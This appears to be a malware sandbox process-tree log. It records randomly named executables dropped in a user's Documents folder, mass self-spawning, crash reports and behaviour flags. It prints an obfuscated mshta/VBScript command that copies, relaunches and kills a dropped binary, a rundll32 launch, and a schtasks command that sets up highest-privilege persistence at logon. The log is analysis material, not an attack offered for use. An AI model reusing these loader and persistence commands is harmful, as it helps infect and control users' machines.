C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9972

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:1028

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9512

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10140

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:3196

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10232

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9384

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10440

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10920

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:6688

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10352

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9844

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10136

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11512

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11920

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11568

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11352

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11488

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:11740

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:12596

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:13232

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:12300

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:13160

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:9716

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:4888

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10704

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:13456

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:14084

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:13684

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10676

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10436

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:12848

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:14540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 14540 -s 24
4⤵
- Program crash
PID:15176

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15156

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:14844

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15248

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15000

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10896

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15512

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:16172

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15632

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:10356

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:16052

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:14292

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:13044

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:15976

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:14092

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:16536

C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
C:\Users\Admin\Documents\sIESWKwSGCFB5N6Xe4D_Gm0p.exe
3⤵
PID:16504

C:\Users\Admin\Documents\GlcT3nCcuGvmoDEZK75Ke4M8.exe
"C:\Users\Admin\Documents\GlcT3nCcuGvmoDEZK75Ke4M8.exe"
2⤵
- Executes dropped EXE
PID:2368

C:\Users\Admin\Documents\1AX2C4itmKm79vcHJb50pVbn.exe
"C:\Users\Admin\Documents\1AX2C4itmKm79vcHJb50pVbn.exe"
2⤵
- Executes dropped EXE
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 664
3⤵
- Program crash
PID:5796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 652
3⤵
- Program crash
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 720
3⤵
- Program crash
PID:6288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 652
3⤵
- Program crash
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 892
3⤵
- Program crash
PID:7620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 1072
3⤵
- Program crash
PID:7524

C:\Users\Admin\Documents\jcTBuAwwQ9QMC84r7XxcLyXd.exe
"C:\Users\Admin\Documents\jcTBuAwwQ9QMC84r7XxcLyXd.exe"
2⤵
- Executes dropped EXE
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 660
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 648
3⤵
- Executes dropped EXE
- Program crash
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 680
3⤵
- Program crash
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 668
3⤵
- Program crash
PID:6680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 1076
3⤵
- Program crash
PID:4868

C:\Users\Admin\Documents\Doc8sn8FnxfF7ycbDLoMoE3c.exe
"C:\Users\Admin\Documents\Doc8sn8FnxfF7ycbDLoMoE3c.exe"
2⤵
- Executes dropped EXE
PID:2816

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4976

C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe
"C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe"
2⤵
- Executes dropped EXE
PID:4212

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScriPT:CLoSe (CReAteoBject("wScripT.ShELl" ). RUN ( "CmD /c cOPY /y ""C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe"" xIGtRO4.eXe && StART xIGtRO4.Exe -pGev0VUn4LUBEIJ &IF """" == """" for %P IN ( ""C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe"" ) do taskkill /f -Im ""%~NxP"" " , 0,trUE ) )
3⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe" xIGtRO4.eXe && StART xIGtRO4.Exe -pGev0VUn4LUBEIJ &IF ""== "" for %P IN ( "C:\Users\Admin\Documents\pd4PGK1I_4ctZ8JzykfMFnnD.exe") do taskkill /f -Im "%~NxP"
4⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\xIGtRO4.eXe
xIGtRO4.Exe -pGev0VUn4LUBEIJ
5⤵
PID:8896

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScriPT:CLoSe (CReAteoBject("wScripT.ShELl" ). RUN ( "CmD /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\xIGtRO4.eXe"" xIGtRO4.eXe && StART xIGtRO4.Exe -pGev0VUn4LUBEIJ &IF ""-pGev0VUn4LUBEIJ "" == """" for %P IN ( ""C:\Users\Admin\AppData\Local\Temp\xIGtRO4.eXe"" ) do taskkill /f -Im ""%~NxP"" " , 0,trUE ) )
6⤵
PID:10748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\xIGtRO4.eXe" xIGtRO4.eXe && StART xIGtRO4.Exe -pGev0VUn4LUBEIJ &IF "-pGev0VUn4LUBEIJ "== "" for %P IN ( "C:\Users\Admin\AppData\Local\Temp\xIGtRO4.eXe") do taskkill /f -Im "%~NxP"
7⤵
PID:9732

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\vGIozn3Y._U6 OtZcNi
6⤵
PID:200

C:\Windows\SysWOW64\taskkill.exe
taskkill /f -Im "pd4PGK1I_4ctZ8JzykfMFnnD.exe"
5⤵
- Kills process with taskkill
PID:8328

C:\Users\Admin\Documents\oceR7XX7WaasPNlh7KK47XB6.exe
"C:\Users\Admin\Documents\oceR7XX7WaasPNlh7KK47XB6.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4444

C:\Program Files (x86)\Company\NewProduct\inst1.exe
"C:\Program Files (x86)\Company\NewProduct\inst1.exe"
3⤵
PID:5228

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
PID:4648

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
3⤵
PID:6136

C:\Users\Admin\Documents\tbm4hlMHnKIcx5LulO6PeSoe.exe
"C:\Users\Admin\Documents\tbm4hlMHnKIcx5LulO6PeSoe.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4404

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
"C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4496

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:4168

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:5088

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:4876

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:2884

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:5328

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:2968

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:5932

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5640

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:180

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:4116

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5320

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5312

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:4448

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
- Executes dropped EXE
PID:5184

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:6516

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:6888

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:4200

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:6464

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:4364

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:7068

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:7376

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:7772

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8148

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:7788

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 24
4⤵
- Program crash
PID:7636

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:6668

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8128

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8248

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8792

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8284

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5792

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9024

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9392

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9920

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9464

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8344

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9540

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9596

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:2020

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:7404

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10408

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10868

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10296

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11052

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10564

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:4504

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11436

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11796

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11408

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11856

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:12180

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:11420

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:12444

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:13016

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:12672

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:5384

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:9324

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:12452

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8668

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:13488

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:14128

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:13804

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:13704

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10012

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:12708

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:14632

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:15220

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:8800

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:14372

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:14940

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:13104

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:15652

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:16352

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:15844

C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
C:\Users\Admin\Documents\KdYIL1HuczMjKv27pdPThPLi.exe
3⤵
PID:10864

